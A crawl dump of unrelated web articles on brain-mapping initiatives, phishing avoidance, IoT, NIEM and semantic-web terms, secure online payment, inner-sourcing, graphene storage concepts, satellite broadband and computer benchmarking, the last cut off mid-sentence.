In January, the European Commission pledged 500 million euros to work towards creating a functional model of the human brain. Then, yesterday, Barack Obama officially announced an initiative to advance neuroscience, funding a large-scale research project aimed at unlocking the secrets of the brain that involves over $100 million in federal spending in the first year alone, as well as investments from private organizations. Both projects are geared towards creating a working model of the brain, mapping its 100 billion neurons. The first, the Human Brain Project, is being spearheaded by Professor Henry Markram of École Polytechnique Fédérale de Lausanne. Together with collaborators from 86 other European institutions, they aim to simulate the workings of the human brain using a giant supercomputer. This would mean compiling information about the activity of individual neurons and neuronal circuits throughout the brain in a massive database. They then hope to integrate the biological actions of these neurons to create theoretical maps of different subsystems, and eventually, through the magic of computer simulation, a working model of the entire brain. Similarly, the United States' recently renamed Brain Research Through Advancing Innovative Neurotechnologies, or BRAIN (previously the Brain Activity Map Project, or BAM), is an initiative that will be organized through the National Institutes of Health, National Science Foundation, and Defense Advanced Research Projects Agency, and carried out in a number of universities and research institutes throughout the U.S.
<urn:uuid:852d0952-6902-434c-9904-203bb79642ec>
CC-MAIN-2017-09
http://www.nextgov.com/health/2013/04/why-spend-billion-dollars-map-human-brain/62260/?oref=ng-dropdown
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00498-ip-10-171-10-108.ec2.internal.warc.gz
en
0.918511
291
3.0625
3
Think Before You Click! Do you know where you’re going online? Or are you just blindly clicking and trusting? A recent security study shows cyber criminals are generating more and more malicious web addresses in hopes that you’re not paying attention to what you’re doing. And so we have to ask—do you look before you click?
Sometimes the emails we receive or social media posts we see are so enticing—who wouldn’t like a free $200 Amazon gift card, right? But as Cynjas we know this activity is called phishing; it’s how a cyber criminal tricks you into becoming their digital puppet! They offer a link that, when clicked, takes you to a spoofed or fake website. You think you’re on a trusted site and do what they ask, like entering confidential information about yourself or family members into their online labyrinth of fraud and misdeeds.
Here are 3 ways you can avoid such a stark cyber fate:
1- Check the Link: Before you click, hover your cursor over the link, or right-click a hyperlink and select “Properties”, to reveal its true destination.
2- Read any URL carefully: Is it spelled correctly? Many times sneaky phishers create websites spelled almost identically to the site that you’re trying to visit as a way to cause confusion. Ask yourself, does anyone in your home need to visit websites ending in .ru or .xxx? We’d say, no way. So don’t click.
3- Use Common Sense: If the email, website or link doesn’t look right—even if the promises seem incredibly enticing—make a sharp U-turn and get out of the digital neighborhood that you’ve found yourself in.
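As a small illustration of the first two tips, the sketch below (my own example, not from the original post; the trusted-host list and URLs are made up) shows how a script might inspect where a link really points before anyone clicks it:

```python
# Very rough link check: flag non-HTTPS links, suspicious top-level domains,
# and hosts that are not on a known-good list. A real filter would do far more.
from urllib.parse import urlparse

TRUSTED_HOSTS = {"www.amazon.com", "amazon.com"}   # hypothetical whitelist

def looks_suspicious(url: str) -> bool:
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":                    # prefer encrypted sites
        return True
    if host.endswith((".ru", ".xxx")):             # TLDs the post warns about
        return True
    return host not in TRUSTED_HOSTS               # unknown host: look closer

print(looks_suspicious("http://arnazon-giftcards.example.ru/win"))  # True
print(looks_suspicious("https://www.amazon.com/"))                  # False
```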
<urn:uuid:4efd3f87-b592-4c1f-b3a9-9bb0166051a5>
CC-MAIN-2017-09
https://www.cynja.com/wrong-turn/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170700.71/warc/CC-MAIN-20170219104610-00018-ip-10-171-10-108.ec2.internal.warc.gz
en
0.919875
371
2.765625
3
When the World Wide Web exploded onto the scene in the 1990s and became a household word, the internet was viewed as the Internet of People – a new tool to access information or to simply communicate with one another. However, that internet of people is now going through a monumental transformation and becoming an Internet of Things (IoT) – a network of tens or even hundreds of billions of smart devices and sensors in which each member has a unique identifier such as an IP address, can gather meaningful data around its environment, and then send that data over the internet without requiring human intervention. So how big is the IoT market and who is getting into the game? IDC estimates1 that the IoT market will grow to be $1.7 trillion (not a typo!) by 2020, when there could be more than 30 billion connected “things”. The potential is so huge that companies across every imaginable sector are jumping head-first into IoT. Cloud platform vendors obviously see a huge opportunity, since all the data from the billions of devices adds up to vast amounts of storage requirements. Software vendors focusing on big data, artificial intelligence (AI), machine learning, and real-time analytics are in big demand to help companies make smart and quick decisions using the deluge of data. Creative hardware companies are making incredibly tiny devices and sensors that make it all possible. Let’s take a look at a few examples of some contemporary IoT companies and products.
Examples of IoT Companies and Products
Consider Fitbit, a popular wearable device with 10 million active users. It can continuously gather data, store it and seamlessly sync it – when a connection is available – with more capable devices such as smartphones. From there, the data is sent to the cloud, which can be accessed by the user anytime, anywhere. One of the requirements of IoT is low-power wireless communication between devices within short distances, since many devices and sensors are very small and thus don’t have enough battery or electrical power. The wearable market’s potential is quickly expanding into smart clothes2, smart shoes2 and more. Demand for smart home devices is also rapidly increasing, with about sixty million households in America ready to embrace this new way of living3. Among these devices, smart thermostats and security devices are thought to grab the lion’s share of the market. If you are wondering what other smart devices and appliances can be sold for a home, consider the fact that a connected toothbrush is already a reality4! Healthcare is another area where IoT has been eagerly adopted, and the market segment is estimated to hit more than $100 billion in the next five years5. Examples in this vertical include smart pill dispensers that remind patients when to take which pills and also automatically reorder the prescription. There are even ingestible smart pills that ensure that the patient actually took the medicine! When a patient swallows the pill, it sends a notification to a battery-powered wearable patch on the patient’s body, which then sends the information to a smartphone6. Industrial IoT (IIoT) is another hot topic that integrates IoT, big data, machine learning and machine-to-machine (M2M) communication. IIoT is considered an essential part of Industry 4.0, otherwise dubbed the “Fourth Industrial Revolution7.” IoT is a huge opportunity which changes the game by leveling the field for new entrants to disrupt and take share from long-established leaders.
The theme of the digital-driven market is “Disrupt or be Disrupted”. That’s where EMC comes in – EMC has been the leader in data and information infrastructure management over the past two decades. With the explosion of IoT data being created, organizations need an enormous amount of processing and capacity to stay ahead of the competitive curve. With Elastic Cloud Storage, EMC provides a cost-competitive, cloud-scale solution which delivers superior agility and object storage performance. Learn how a winning IoT strategy starts with ECS cloud storage. Check out the video below to see how ECS can ready your organization for the wave of the Internet of Things. Try ECS today for free for non-production use by visiting www.emc.com/getecs.
Tags: ECS, Elastic Cloud Storage, internet of things, IOT, Object Storage
<urn:uuid:c6c54629-e4ce-414c-b633-a6737d58ee0a>
CC-MAIN-2017-09
http://emergingtechblog.emc.com/breakfast-with-ecs-the-internet-of-things-iot-part-1/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00194-ip-10-171-10-108.ec2.internal.warc.gz
en
0.941942
879
2.671875
3
It's all semantics: A glossary of machine-to-machine communications
Key terms elucidate the National Information Exchange Model and semantics - By John Moore - Mar 22, 2011
Data component: The basic building block of NIEM -- could represent a person, an organization, etc.
Global Justice XML Data Model (GJXDM): A guide for information exchange in the justice and public safety sectors; NIEM precursor.
Information Exchange Package Documentation (IEPD): The instructions for assembling a NIEM exchange -- based on a subset of a reference schema.
Naming and Design Rules (NDR): A set of rules for promoting consistent NIEM schema development. Can be used to layer an incremental semantics on top of base XML.
Reference schemas: The unabridged set of data components within a slice of NIEM -- justice, for example.
Resource Description Framework (RDF): As a key semantic Web standard, RDF describes resources -- documents, people, concepts, etc. -- in a machine-readable way.
Semantic Web: A common framework that seeks to improve access to data by making it easier for machines to interpret.
Web Ontology Language (OWL): A Semantic Web standard that goes beyond RDF, boosting the ability of computers to interpret content.
John Moore is a freelance writer based in Syracuse, N.Y.
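As a small, hypothetical illustration of the RDF entry above (not part of NIEM or the glossary itself), the snippet below uses the third-party rdflib Python library to express a resource as machine-readable triples; the URIs and names are invented:

```python
# Describe a "person" resource with two RDF triples and print them as Turtle.
from rdflib import Graph, Literal, Namespace
from rdflib.namespace import RDF, FOAF

EX = Namespace("http://example.org/niem-demo/")   # made-up namespace
g = Graph()

person = EX["person1"]
g.add((person, RDF.type, FOAF.Person))            # the resource is a person
g.add((person, FOAF.name, Literal("Jane Doe")))   # with a machine-readable name

# Depending on the rdflib version, serialize() returns str or bytes.
print(g.serialize(format="turtle"))
```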
<urn:uuid:4b121c19-a588-49bf-973a-6593c6621bfd>
CC-MAIN-2017-09
https://gcn.com/articles/2011/03/21/niem-semantic-side-2.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00194-ip-10-171-10-108.ec2.internal.warc.gz
en
0.775892
302
2.546875
3
First, and this is really important, use safe Internet security practices to make sure you are at the site you want and that you have a secure Internet connection. Also, never enter credit card or personal banking or investment account information on a computer that is not currently protected by anti-virus and anti-spyware software. Finally, it’s probably not a good idea to enter credit card or personal banking or investment account information from a public hotspot. The safest way to pay or bank online is with some sort of personal digital security device that verifies your identity. This ensures no one can fraudulently use your personal information. This could be a one-time password (OTP) token, a small device that generates a different password you must enter for every online payment or login. Or it could be a smart card-the mini computer inside your bankcard with special security software-used in Canada, Latin America, Europe and Japan. You can either insert your card into a small reader to generate an OTP or connect the smart card to your PC with a USB reader. These both act as an additional security measure when you pay online or login to your bank account. Banks call this “two-factor” authentication-something you know, the PIN, and something you have, the card or token. This is similar to when you make an ATM withdrawal, requiring both a card and a PIN code. Two-factor authentication makes online payment and online banking more secure. For example, Barclays, a leading UK bank, reports zero online fraud among customers using EMV-compliant chip and PIN cards with handheld readers for logins.1
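For illustration only, here is a rough sketch of the idea behind such one-time password tokens, following the HMAC-based HOTP construction from RFC 4226; the secret and counter values are placeholders, and real tokens and banks add many further safeguards:

```python
# HOTP: HMAC-SHA1 over a moving 8-byte counter, dynamically truncated to digits.
import hashlib
import hmac
import struct

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    msg = struct.pack(">Q", counter)                     # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                           # dynamic truncation offset
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

secret = b"shared-secret-provisioned-by-bank"            # illustrative only
for counter in range(3):                                  # each use advances the counter
    print(counter, hotp(secret, counter))
```

Because the counter (or, in time-based variants, the clock) changes on every use, an intercepted code is worthless for the next login, which is exactly what makes the second factor valuable.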
<urn:uuid:2f995f9b-f239-45c4-9994-5a8bd379cebf>
CC-MAIN-2017-09
https://www.justaskgemalto.com/en/what-safest-way-pay-online/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00370-ip-10-171-10-108.ec2.internal.warc.gz
en
0.916056
339
2.890625
3
Compared to many engineering disciplines, software development - which began in earnest in the mid-20th Century - is still in its youth. The science and art of software development have progressed in two broad threads: the tools themselves (IDEs, compilers, languages, frameworks, build/CI systems, etc.) and the development methodologies employed - which together determine the efficiency, scalability and flexibility of the development process. At the same time, development processes have evolved from closed, completely internal and highly controlled processes to more collaborative, agile and open approaches, utilizing many open source components. The methodologies have evolved considerably, as have the tools that enable these methods - from ad hoc to waterfall to agile. Today, we are hearing from customers more and more frequently that they want to gain the benefits of open source community-style collaborative development inside their corporate development organizations – what Tim O’Reilly has called “inner-sourcing.” Tim O’Reilly coined the term “inner-sourcing” in 2000, describing it as: “the use of open source development techniques within the corporation.” Tim observed even back then that the collaborative, self-motivated, meritocratic process of open source development was different and had several potential advantages over traditional development, particularly on dimensions of improving quality (the multiple eyeballs phenomenon noted by Eric Raymond in “The Cathedral and the Bazaar” in 1999), the ability to enhance innovation (multiple brains collaborating on the same problem), and the sharing and reuse of code. Prof. Dirk Riehle, University Erlangen-Nurnberg, Germany, describes “inner source” in much the same way, and his research on open collaboration within corporations finds similar benefits. Open source techniques and communities - and the code they produce - have grown and evolved significantly since then, and are still accelerating. Consider that the number of unique open source projects will exceed 600,000 this year, has been growing 35-40% CAGR for the last six years - and more than doubled in the last two alone. “Outsourcing” began in the 1980s and accelerated in the 1990s as development organizations worked through an early wave of cost cutting and efficiency initiatives. Competition forced development teams to prioritize and focus on what they did well and where they could deliver premium value in the software they created. Development of non-core, low value features/functions were “outsourced” to the cheapest bidder, and outsourcing helped deliver more value from increasingly scarce internal development resources. Inner-sourcing is driven by similar but more evolved motivations. Corporate IT has made extensive use of open source code for years. Gartner reported that on average, 29% of deployed code was open source, and that by 2015 at least 95% of mainstream IT organizations will leverage open source solutions within mission critical software deployments. So while open source code is being widely adopted, it’s only recently that corporate IT became interested in the efficiencies of the open, collaborative creation process itself. Projects spin up quickly and attract contributors organically without advertising or hiring; large distributed teams produce high quality innovative code with little overhead; and it’s all done completely in the open. 
Open collaborative development via communities is widely understood and accepted, and corporate IT organizations are realizing that these characteristics can be applied to improve their internal development as well; many are looking to apply them to enhance their own internal methods, typically in conjunction with adopting agile or lean methodologies. Given the inbound interest into Black Duck’s Olliance Group on this topic, in my view, this will soon become an influential method within development organizations. The benefits these organizations are consistently looking for, when exploring inner-sourcing, include:
- Code reuse
- Better quality
- Improved innovation
- Cross-organization visibility into code, projects, skillsets
- Cross-organization collaboration, buy-in
- Developer engagement and morale, motivation, volunteerism
Let’s take a look at the characteristics of open source methods that will enable and empower inner-sourcing:
Transparent and Collaborative
In a corporate IT environment, transparency and collaboration can enable people with expert resources to contribute and provide feedback where previously it was not possible; they can compel and attract engagement, and attract new community members, perhaps contributing in their spare time, i.e., corporate developers paradoxically “moonlighting” or volunteering for other projects within their own company. Developers decide to join (or not) and contribute to projects based on a number of factors, including how interesting the work is, the ability to make an impact and be recognized for it, and whether the person considering engaging needs the software or finds it valuable. The more transparent the process, the more information will be available, and the better that information will be for potential contributors to act or respond. Corporate IT developers share many of the same motivational self-interests of open source community developers around solving problems and being recognized for their contributions. Providing higher levels of visibility and information in a systematic way enables developers to volunteer and self-organize around areas of interest and/or their unique skills and capabilities. In the corporate IT case, the organization must sponsor and endorse the process, but not dictate. In the best-practice cases Black Duck has worked with, there is often a cross-department, self-formed and managed steering group that provides the leadership and “activation energy” that gets the community-style collaboration going. The open source community values and provides public feedback, both positive and negative, on contributions and contributors. While some open source communities exhibit somewhat harsh personal criticisms, many participants value their apolitical nature, for if you can succeed in a difficult environment, you can burnish your reputation. Recognition of one’s contributions can be in the form of individual comments and feedback. Some communities have created an infrastructure for the community to provide recognition of achievements. Jono Bacon, the Ubuntu Community Manager from Canonical, recently wrote an excellent blog about their approach for recognizing achievements: “The Gamification of Community.” In a corporate environment, peer feedback and recognition can be a new and powerful form of motivation, while “gamification” techniques can provide more formal recognition tailored to corporate objectives.
While I’ve been describing inner-sourcing methods, it’s important to note that development tools are evolving in this area as well, enabling more social aspects of development. The source code management (SCM) project Git first took hold in the open source community because its dynamic forking and merging capability was well-suited to the distributed and independent nature of the open process. Git is becoming widely adopted in corporate IT environments, indicating the willingness and interest of developers to exploit the same non-linear development benefits. Git’s popularity in corporate IT is an example of how developer self-interests can be a powerful positive force. Another enhancement to the development tool set is likely to include a way to capture actionable metadata on the code, contributions and contributors, and make it available to the internal community. Making metadata available, such as performance attributes and behavioral data (coding trends, comments, commits per developer, etc.), provides insights which can foster collaboration and suggest areas for process innovation. We’ve seen this work on Open Hub, our free community resource, and expect corporate IT would benefit from it as well. It’s no secret that corporate IT seeks to increase efficiency, scalability and quality. Inner-sourcing can provide a new approach to achieving these benefits, and it has already been proven – in thousands of successful open source project communities. And while many will observe that community-driven open source processes have been outpacing standard corporate IT processes for years, the level of interest I see on the part of corporate IT suggests that is about to change.
<urn:uuid:1ce5ab49-3e87-4797-8c36-0011e90914d0>
CC-MAIN-2017-09
http://blog.blackducksoftware.com/inner-sourcing-adopting-open-source-development-processes-in-corporate-it/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00242-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947562
1,626
2.671875
3
A design concept being floated by dataSTICKIES uses wafer-thin graphene USB thumb drives that you can write on, peel off and stick anywhere for real on-the-go capacity. A start-up company hopes to launch a new consumer data storage product that uses film-thin, graphene-based flash drives users can make notations on and then stick anywhere like a sticky note. The namesake company, dataSTICKIES, said the futuristic design concept is aimed at replacing thumb drives that it said are difficult to insert into computers. dataSTICKIES would come in a pad like a sticky note, but store many gigabytes of data. The graphene-based sticky note flash drives relay data to a computer via a proprietary Optical Data Transfer Surface (ODTS). "DataSTICKIES are envisaged to solve this problem by carrying data like a stack of sticky-back notes," the company wrote on its website. "Each of the dataSTICKIES can be simply peeled from the stack and stuck anywhere on the proposed ODTS. The ODTS is a thin panel at the top of the graphene flash drive and is conductive. It adheres to any surface, such as a computer screen or mobile device, and then wirelessly transfers the data through the proprietary protocol. As data is being read from the dataSTICKIES, the colored, translucent edges light up. dataSTICKIES come with a graphene memory layer, a conductive layer and a data transfer layer. Marketing photos show dataSTICKIES with 4GB to 32GB of data storage capacity. The wafer-thin flash drives would be constructed of a single layer of graphene. Graphene, created by scientists less than a decade ago, is made up of carbon atoms and looks like chicken wire or lattice through an electron microscope. It is not only the thinnest material, but also the strongest known to exist. Researchers at Rice University several years ago demonstrated Graphene Memory made from a layer of graphite only 10 atoms thick. The technology could potentially provide many times the capacity of current flash memory while withstanding temperatures of 200 degrees Celsius and radiation that would make NAND flash solid-state disk memory disintegrate. Graphene memory not only has the potential to offer higher capacity in smaller form factors, but greater performance than today's industry standard floating-gate flash memory, or even charge-trap flash memory. DataSTICKIES said the idea is to have the sticky flash drives come in various colors and patterns that make data segregation according to type and size easier. "They can be stacked and used together for increased capacity which also enables carrying them together," the company stated. dataSTICKIES would be able to adhere to any surface while also transferring data wirelessly. Lucas Mearian covers consumer data storage, consumerization of IT, mobile device management, renewable energy, telematics/car tech and entertainment tech for Computerworld. Follow Lucas on Twitter at @lucasmearian or subscribe to Lucas's RSS feed. His e-mail address is [email protected]. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center. This story, "Graphene sticky notes to offer 32GB capacity you can write on" was originally published by Computerworld.
<urn:uuid:b9c99aee-ad3f-4bd7-ace5-a3f8f29b45c3>
CC-MAIN-2017-09
http://www.networkworld.com/article/2172824/data-center/graphene-sticky-notes-to-offer-32gb-capacity-you-can-write-on.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00242-ip-10-171-10-108.ec2.internal.warc.gz
en
0.929848
685
2.5625
3
Broadband comes in many forms, and different broadband service providers use an array of wildly different technologies, but the problem is that not everyone lives in a densely populated area where DSL and/or cable-broadband services are readily available. In such areas there are only a few alternative forms of broadband services to choose from, but one that many people overlook is satellite-based broadband. Satellite broadband may not be appropriate for all users and applications, especially those with low ping-time requirements, but satellite broadband may be the only broadband option for some consumers, at least for the time being.
How Satellite Broadband Works
One of the strengths of satellite broadband is that it only requires a clear line of sight from the orbiting satellite to a dish located somewhere on the property of any given consumer. Typical mounting locations include roofs and upper portions of exterior walls, but the only thing that is truly required is a line of sight. Once the line of sight has been established, the entire process of transmitting data is fairly simple: a satellite broadband service provider has at least one transmission hub facility that is connected to the Internet via metal wires and/or fiber optic cabling as well as to its orbiting satellite(s) via its own dish or dishes. The dish or dishes used at such a hub facility are usually much larger and capable of greater data rates than those used by individual consumers. Data flows to and from the hub to an orbiting satellite, which in turn communicates with the dishes owned by consumers. The entire process may sound complex on the surface, but it is really similar to other forms of broadband, which use similar hubs but use them to change technologies and split large data pipelines into numerous smaller lines. The key difference is that the wires end at some point with satellite broadband, and a large gap is created that is serviced via a satellite or group of satellites.
How Fast is Satellite Broadband?
Satellite broadband offered by companies such as WildBlue, the same company that DirecTV partners with to power their own satellite broadband services, offers performance that may not be the best choice for everyone. WildBlue currently offers downstream speeds of up to 1.5 Mbps and upstream speeds of up to 256 Kbps. These speeds are certainly faster than dial-up services, but are really only competitive with low-end DSL and cable-broadband offerings in most areas. As cable, DSL and fiber optic broadband solutions continue to evolve, satellite services may be left further behind. After all, upgrading terrestrial wiring and service centers is a little easier than adding a new satellite. Downstream and upstream speeds are not the only performance consideration, however. Ping times using satellite services are much greater than ping times using terrestrial networks. This is due to the need for data to travel from one point on the Earth to a satellite which is usually orbiting between 22,000 and 25,000 miles above the surface of the planet and back again. Given that satellites transmit and receive signals traveling at the speed of light, 186,000 miles per second, the additional distance of 45,000 to 50,000 miles results in a delay that is roughly a quarter of a second in one direction. To put that into perspective, the equatorial circumference of the Earth is a little over 24,900 miles. Ping times measure a round trip, which results in nothing less than a half-second delay.
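A quick back-of-the-envelope check of those figures (my own arithmetic, using a representative altitude in the quoted range):

```python
# Estimate one-way and round-trip latency for a geostationary satellite link.
SPEED_OF_LIGHT_MPS = 186_000          # miles per second, approximate
ALTITUDE_MILES = 22_500               # roughly 22,000-25,000 miles up

one_way_miles = 2 * ALTITUDE_MILES            # dish -> satellite -> ground hub
one_way_seconds = one_way_miles / SPEED_OF_LIGHT_MPS
round_trip_seconds = 2 * one_way_seconds      # a ping has to come back again

print(f"one-way delay:   {one_way_seconds * 1000:.0f} ms")    # about 242 ms
print(f"round-trip ping: {round_trip_seconds * 1000:.0f} ms")  # about 484 ms
```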
High ping times make some applications perform poorly, especially those that are time-sensitive such as live voice and video streaming and many online games. Not all tasks require low ping times, such as downloading, but even these tasks may not feel as snappy or fast as they would if the latency was not quite so high. Of course, many consumers shopping for satellite broadband services may be doing so because the only alternative is dial-up Internet access, or there is no alternative form of Internet access available. In these cases, the technical limitations of satellite broadband might not seem so bad.
Weather Can Affect Performance
Due to the nature of satellite transmissions, rain and other airborne moisture can have a detrimental effect on transmission quality. Given the two-way trip that data has to make into and from orbit, there is always a chance that airborne moisture will play a role in limiting performance. This can be mitigated to a degree by having satellites capable of directing data traffic to different stations on the ground that are strategically located. More stations means less chance of data being affected from the hub to the satellite, but there is not much that can be done to ensure that data being transmitted between the customer’s dish and the satellite is not affected by the weather. Bandwidth caps are nothing new to broadband providers or their customers, though most satellite broadband services are very clear regarding their usage limits. This practice may be attributable to the very technical and finite limitations of satellites, which cannot be easily upgraded in an incremental fashion. Instead, upgrades must come in the form of additional satellites in most cases. This limitation certainly raises questions about the efficacy of satellite-based broadband solutions, and calls into question their future. WildBlue offers data caps ranging from 7,500 megabytes per month to 17,000 megabytes per month.
Future of Satellite Broadband
Luckily, there are a number of factors that are working in favor of satellite broadband. The first factor is that virtually all technology improves over time, and it is certainly possible that faster satellite broadband services could be deployed in the future. Unlike companies that use copper wiring or fiber optics, satellite broadband services could theoretically be expanded by simply launching new satellites. This brings up another factor working in favor of satellite broadband solutions: globalization, technological advances, and other factors have made launching satellites more affordable than ever before. The downside is, of course, that investments in infrastructure are understandably expensive for satellite broadband carriers. Still, satellite-based broadband may be the only option for consumers who use satellite broadband on their boats, RVs, cabins, or other places where other forms of broadband are simply unavailable. This gives satellite broadband a niche that is not likely to be contested until coast-to-coast WiMax coverage is available and/or 4G/5G networks extend their reach significantly.
<urn:uuid:5a8495e0-736a-4917-8181-2e62ee0e6583>
CC-MAIN-2017-09
http://www.highspeedexperts.com/satellite-broadband/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00538-ip-10-171-10-108.ec2.internal.warc.gz
en
0.954316
1,248
2.921875
3
It used to be simple: Multiply the microprocessor's clock rate by four, and you could measure a computer's computational power in megaFLOPS (millions of floating point operations per second) or gigaFLOPS (billions of FLOPS). No more. Today they're talking about teraFLOPS (trillions) and petaFLOPS (quadrillions) -- which brings up an important question: How do you benchmark these much-more-powerful systems? "The majority of modern processors are systems on a chip and that has completely muddied the water," says Gabe Gravning, director of product marketing at AMD. An x86 microprocessor may actually include multiple processor cores, multiple graphics co-processors, a video encoder and decoder, an audio co-processor and an ARM-based security co-processor, he explains. "For the longest time we built single-core processors and pushed the frequency as hard as possible, as frequency was the clearest correlation to performance," agrees Rory McInerney, vice president of Intel's Platform Engineering Group and director of its Server Development Group. "Then came dual cores, and multiple cores, and suddenly 18 cores, and power consumption became more of a problem, and benchmarks had to catch up." But at the same time, benchmarks are integral to the systems-design processes, McInerney explains. When a new chip is considered, a buyer will "provide snippets of applications that best model performance in their environment -- they may have a certain transaction or algorithm they want optimized," he says. "From there we need a predictive way to say that if we take option A we will improve B by X percent," McInerney says. "For that we develop synthetic or internal benchmarks, 30 to 50 of them. These benchmarks tend to stay with the same CPU over the life of the product. Then we see how the [internal] benchmarks correlate to standard [third-party] benchmarks that we can quote." Gravning adds, "There is no perfect benchmark that will measure everything, so we rely on a suite of benchmarks," including both internal and third-party benchmarks; this part of the process hasn't really changed over the years. As for the nature of those benchmarks, "The internal ones are proprietary, and we don't let them out," McInerney notes. "But for marketing we also need ones that can be replicated by a third party. If you look bad on an external benchmark all the internal ones in the world won't make you look good. Third-party benchmarks are vital to the industry, and are vital to us." As a third-party benchmark for desktop and consumer devices, sources regularly mention the PCMark and 3DMark benchmarks, both from Futuremark Corp. in Finland. The first is touted for assessing Windows-based desktops, and the second for benchmarking game performance on Windows, Android, iOS and Windows RT devices. But for servers and high-performance machines, three names keep coming up: TPC, SPEC and Linpack. Formed in 1988, the Transaction Processing Performance Council (TPC) is a non-profit group of IT vendors. It promotes benchmarks that simulate the performance of a system in an enterprise, especially a stock brokerage (the TPC-E benchmark) or a large warehouse (TPC-C). (The newest TPC benchmark measures Big Data systems.) The scores reflect results specific to that benchmark, such as "trade-result transactions per second" in the case of the TPC-E benchmark, rather than machine speed.
TPC benchmarks typically require significant amounts of hardware, require person-power to monitor, are expensive to set up and may take weeks to run, explains Michael Majdalany, TPC spokesman. Additionally, an independent auditor must certify the results. Consequently, these benchmarking tests are usually carried out by the system manufacturers, he adds. After results are posted, any other TPC member can challenge the results within 60 days and a technical advisory board will respond, adds Wayne Smith, TPC's general chairman. Most controversies have involved pricing, since benchmarks are often run on machines before the systems -- and their prices -- are publicly announced, he adds. One that did get some press: In 2009 the TPC reprimanded and fined Oracle $10,000 for advertising benchmarking results that rival IBM complained were not based on audited tests. The oldest TPC benchmark still in use is the TPC-C for warehouse simulation, going back to the year 2000. Among the more than 350 posted results, scores have varied from 9,112 transactions per minute (using a single-core Pentium-based server in 2001) to more than 30 million (using an Oracle SPARC T3 server with 1,728 cores in 2010). TPC literature says such differences reflect "a truly vast increase in computing power." The TPC also maintains a list of obsolete benchmarks for reference purposes. Smith recalls that some were rendered obsolete almost overnight. For instance, query times for the TPC-D decision-support benchmark dropped from hours to seconds after various database languages began adopting a function called "materialized views" to create data objects out of frequently-used queries, he recalls. Smith says that the TPC has decided to move away from massive benchmarks requiring live auditors and towards "express benchmarks" that are based on the results of running code that the vendor can simply download, especially for big data and for virtualization applications. "But the process of writing and approving a benchmark is still lengthy, in terms of getting everyone to agree," Smith adds. Also founded in 1988, the Standard Performance Evaluation Corporation (SPEC) is a non-profit corporation that promotes standardized benchmarks and publishes the results, selling whichever source code is needed for the tests. Currently, SPEC offers benchmarks for the performance of CPUs, graphics systems, Java environments, mail servers, network file servers, Web servers, power consumption, virtualized environments and various aspects of high-performance computing. Its oldest benchmark still in use, and probably its best known, is the SPEC CPU2006, which, as its name implies, gauges CPUs and was published in 2006. ("Retired" versions of SPEC go back to 1992.) The SPEC CPU2006 is actually a suite of applications that test integer and floating point performance in terms of both speed (the completion of single tasks) and throughput (the time needed to finish multiple tasks, also called "rate" by the benchmark). The resulting scores are the ratio of the time-to-completion for the tested machine compared to that of a reference machine. In this case the reference was a 1997 Sun Ultra Enterprise 2 with a 296MHz UltraSPARC II processor. It originally took the reference machine 12 days to complete the entire benchmark, according to SPEC literature. At this writing the highest CPU2006 score (among more than 5,000 posted) was 31,400, for integer throughput on a 1,024-core Fujitsu SPARC M10-4S machine, tested in March 2014. 
In other words, it was 31,400 times faster than the reference machine. At the other extreme, a single-core Lenovo Thinkpad T43, tested in December 2007, scored 11.4. Results are submitted to SPEC and reviewed by the organization before posting, explains Bob Cramblitt, SPEC communications director. "The results are very detailed so we can see if there are any anomalies. Occasionally results are rejected, mostly for failure to fill out the forms properly," he notes. "Anyone can come up with a benchmark," says Steve Realmuto, SPEC's director. "Ours have credibility, as they were produced by a consortium of competing vendors, and all interests have been represented. There's full disclosure, the results must be submitted in enough detail to be reproducible and before being published they must be reviewed by us." The major trend is toward more diversity in what is being measured, he notes. SPEC has been measuring power consumption vs. performance since 2008, more recently produced a server efficiency-rating tool, and is now working on benchmarks for cloud services, he adds. "We don't see a lot of benchmarks for the desktop," Realmuto adds. "Traditional desktop workloads are single-threaded, while we focus on the server space. The challenge is creating benchmarks that take advantage of multiple cores, and we have succeeded." FLOPS remains the main thing measured by the Linpack benchmark, which is the basis for the Top500 listing posted every six months since 1993. The list is managed by a trio of computer scientists: Jack Dongarra, director of the Innovative Computing Laboratory at the University of Tennessee; Erich Strohmaier, head of the Future Technologies Group at the Lawrence Berkeley National Laboratory; and Horst Simon, deputy director of Lawrence Berkeley National Laboratory. The top machine in the latest listing (June 2014) was the Tianhe-2 (MilkyWay-2) at the National Super Computer Center in Guangzhou, China. A Linux machine based on Intel Xeon clusters, it used 3,120,000 cores to achieve 33,862,700 gigaFLOPS (33,862.7 teraFLOPS, or almost 34 petaFLOPS). Number one in the first list, in June 1993, was a 1,024-core machine at the Los Alamos National Laboratory that achieved 59.7 gigaFLOPS, so the list reflects improvements approaching six orders of magnitude in 21 years. Linpack was originally a library of Fortran subroutines for solving various systems of linear equations. The benchmark originated in the appendix of the Linpack Users Guide in 1979 as a way to estimate execution times. Now downloadable in Fortran, C and Java, it times the solution (intentionally using inefficient methods to maximize the number of operations used) of dense systems of linear equations, especially matrix multiplication. Results are submitted to Dongarra and he then reviews the claims before posting them. He explains that the Linpack benchmark has evolved over time; the list now relies on a high-performance version aimed at parallel processors, called the High-Performance Computing Linpack Benchmark (HPL) benchmark. But Dongarra also notes that the Top 500 list is planning to move beyond HPL to a new benchmark that is based on conjugate gradients, an iterative method of solving certain 